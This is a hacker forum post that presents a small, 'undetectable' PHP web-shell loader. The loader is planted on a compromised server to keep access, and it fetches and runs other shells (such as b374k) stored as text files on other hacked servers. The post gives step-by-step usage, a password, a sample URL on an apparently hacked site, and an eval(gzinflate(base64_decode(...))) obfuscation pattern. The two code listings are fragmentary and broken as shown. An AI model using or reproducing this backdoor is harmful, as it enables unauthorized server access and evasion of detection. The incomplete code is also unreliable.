
incredible, FUD and smallest shell By Indishell

Pranaam To all Bhai ji _/\_
Today i am gonna share a PHP script which work as a smallest and undetectable hacking shell
Script name is "incredible shell" (dedicated to my friend incredible aka jags)
First of all  Warm Hugs to Hardeep singh and Aasim bhai ji (who helpedin understanding ceoncept of FUD shell) :')

ok lets start
you can backdoor server using 2 ways

one script is for simplePHP code(not encoded with any encryption) , second one will be use when your php shells are encoded with any php encryption like base64 , or combination of encoding schemes like this  gzinflate(str_rot13(base64_decode()))

before proceedding , let me tell you the algorithm and working of this shell

this script need shell code for execution ,it dont has its own  :P
means , upload this script to server where you want to maintain your access .  and wheneveryou want a shell on server using this script, you need to upload code of that shell on any other server as a text file and  then just type url location of that txt shell file in incredible shell and incredible shell will change into that shell :D

 here is steps with full explanation

 Step 1:-

 upload incredible shell on server where you want to maintain your access
 lets suppose i have incredible shell on server


ok i want to launch b374k shell using incredible shell on server

so first i need to upload code of b374k shell on any other hacked server in txt file
for example i am saving code of b374k shell on a server whose URL is http://al-mukarram.com/admin/t.txt
NOTE:- dontforgetto remove <?php  tag in startof shellcode and ?> in the last of shell code

Step 3:-
ok now i have hosted my shell code on server too,just copy the link ok .txt shell

in incredible shell link interface ,we need to type password indishell_ica in pass field and .txt shell link  i.e  http://al-mukarram.com/admin/t.txt
click "khul ja sim sim" button and incredible shell  will change into b374k shell >:D<

Bangged  XD


if your shell code is plain means code is not encoded with any php encoding scheme use code 1
if your shell code is encoded with any type of php encoding scheme , use code 2
and when you use encoded shell code , your shellcode must be in ' '
means it shouldbe like this

eval (gzinflate(base64_decode(' encoded_shell_code ')));

 still you face any  problem,ping me at manish.1046@gmail.com :P

 Code 1 starts here

/* Coded By Manish Kishan Tanwar AT IndiShell Lab  */

echo "<title>--==[[ iNcReDiBlE SH3LL By ICA ]]==--</title>";

$_SESSION['data'] =$link;
echo '<body bgcolor=black><div align=center><font color=#ff9933 size=5 face="comic sans ms">--==[[ InCreDibLe</font><font color=white size=5 face="comic sans ms">  SHelL By</font><font color=green size=5 face="comic sans ms"> Team IndiShElL ]]==--</font><br><font color=white size=3 face="comic sans ms">A script dedicated to my friend "Incredible AKA Jags"</font><br><font color=#ff9933 size=3 face="comic sans ms">--==[[ Love To ]]==--</font></font><br><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="20" width="40%"><font color=white size=3>Zero cool,C0dE breaker ica, Aasim shaikh,Reborn,LOrd crusi, Raman kumar rana,INX_r0ot,Darkwolf indiShEll, Chinmay Pandya ,Silent poison India,Magnum sniper,ethicalnoob IndiSh3ll,Hardeep, Mannu, Viki,AR AR,Hackuin, Salty,Brown suger,Mahi Tanwar ,  and Suriya prakash </marquee> <br><br><img src="http://i1.ytimg.com/vi/hMBKmQEPNzI/0.jpg" height=400 width=600>  <br><font color=white size=4>~~Special Fuck Goes to suriya cyber Tyson :P xD || warm hugs to Hardeep bhai and Aasim bhai ji (my guides for this script) <3 <3  ~~<br><br><font color=white size=3><form method=post>
P@ss --> <input type=text name=key>&nbsp &nbsp SH3LL which you want to load --> <input type=text name=slink>
<input type=submit  name=launch value="Khul JA SIM SIM >:D<"></form></font>';
if($_SESSION['data']!= null)

  end of code 1
start of code 2


/* Coded By Manish Kishan Tanwar AT IndiShell Lab  */

echo "<title>--==[[ iNcReDiBlE SH3LL By ICA ]]==--</title>";

function apna_data($text,$marqueurDebutLien,$marqueurFinLien)
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
return $ar;
$_SESSION['data'] =$link;
echo '<body bgcolor=black><div align=center><font color=#ff9933 size=5 face="comic sans ms">--==[[ InCreDibLe</font><font color=white size=5 face="comic sans ms">  SHelL By</font><font color=green size=5 face="comic sans ms"> Team IndiSh3LL ]]==--</font><br><font color=white size=3 face="comic sans ms">A script dedicated to my friend "Incredible AKA Jags"</font><br><font color=#ff9933 size=3 face="comic sans ms">--==[[ Love To ]]==--</font></font><br><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="20" width="40%"><font color=white size=3>Zero cool,c0de BreaKer ica, Aasim shaikh,Reborn,LOrd crusi, Raman kumar rana,INX_r0Ot,Darkwolf indish3Ll, Chinmay Pandya ,Silent poison India,Magnum sniper,ethicalnoob Indish3Ll,Hardeep, Mannu, Viki,AR AR,Hackuin, Salty,Brown suger,Mahi Tanwar ,  and Suriya prakash </marquee> <br><br><img src="http://i1.ytimg.com/vi/hMBKmQEPNzI/0.jpg" height=400 width=600>  <br><font color=white size=4>~~Special Fuck Goes to suriya cyber Tyson :P xD || warm hugs to Hardeep bhai and Aasim bhai ji (my guides for this script) <3 <3  ~~<br><br><font color=white size=3><form method=post>
P@ss --> <input type=text name=key>&nbsp &nbsp SH3LL which you want to load --> <input type=text name=slink>
<input type=submit  name=launch value="Khul JA SIM SIM >:D<"></form></font>';
if($_SESSION['data']!= null)

  End of code 2
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